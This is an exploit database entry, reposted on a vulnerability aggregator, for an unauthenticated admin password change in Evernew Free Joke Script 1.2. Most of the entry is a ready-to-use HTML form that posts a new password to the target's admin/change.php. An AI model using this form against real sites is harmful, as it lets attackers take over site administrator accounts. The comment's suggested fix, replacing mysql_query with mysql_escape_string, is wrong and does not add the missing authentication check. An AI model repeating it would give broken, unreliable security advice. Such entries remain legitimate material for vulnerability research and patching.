Search...

Evernew Free Joke Script 1.2 - Remote Change Password Exploit

2009-06-15T00:00:00
ID EDB-ID:8956
Type exploitdb
Reporter Hakxer
Modified 2009-06-15T00:00:00

Description

Evernew Free Joke Script 1.2 Remote Change Password Exploit. Webapps exploit for php platform

                                        
                                            <!--
  Discovered & Exploited by : Hakxer
  Evernew Free Joke Script 1.2 => Remote Change Password
 
  [=>] Bug detail
  bug in change.php file
  in line 10 :
  $result=mysql_query("update admin set password='$pass'");
 -----------------------
 
  [=>] Fix
  $result=mysql_escape_string("update admin set password='$pass'");
  change mysql_query to mysql_escape_string
 
  [=>] Greetz : ExH , ProViDoR , Error code , dody2100 , sinaritx , all my friends
!-->
<form action="http://www.site.com/script/admin/change.php" method="post" name="form1" id="form1" onSubmit="MM_validateForm('password','','R');return document.MM_returnValue">
<font class="text"><b>enter password to change it in admin :D</b></font> <br />
<br/>
<table width="305" height="106" border="0" cellpadding="5" cellspacing="0">
<tr>
<td width="103" class="text">Password : </td>
<td width="182"><div align="left">
<input name="password" type="password" class="style7" id="password" />
</div></td>
</tr>
<tr>
<td colspan="2"><div align="center">
<input name="Submit" type="submit" class="text_1" value="Change Password" />
</div></td>
</tr>
<tr>
<td colspan="2"><?php echo($msg); ?> </td>
</tr>
</table>
</form>

# milw0rm.com [2009-06-15]
JSON Vulners Source
Initial Source


All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2017
Protected by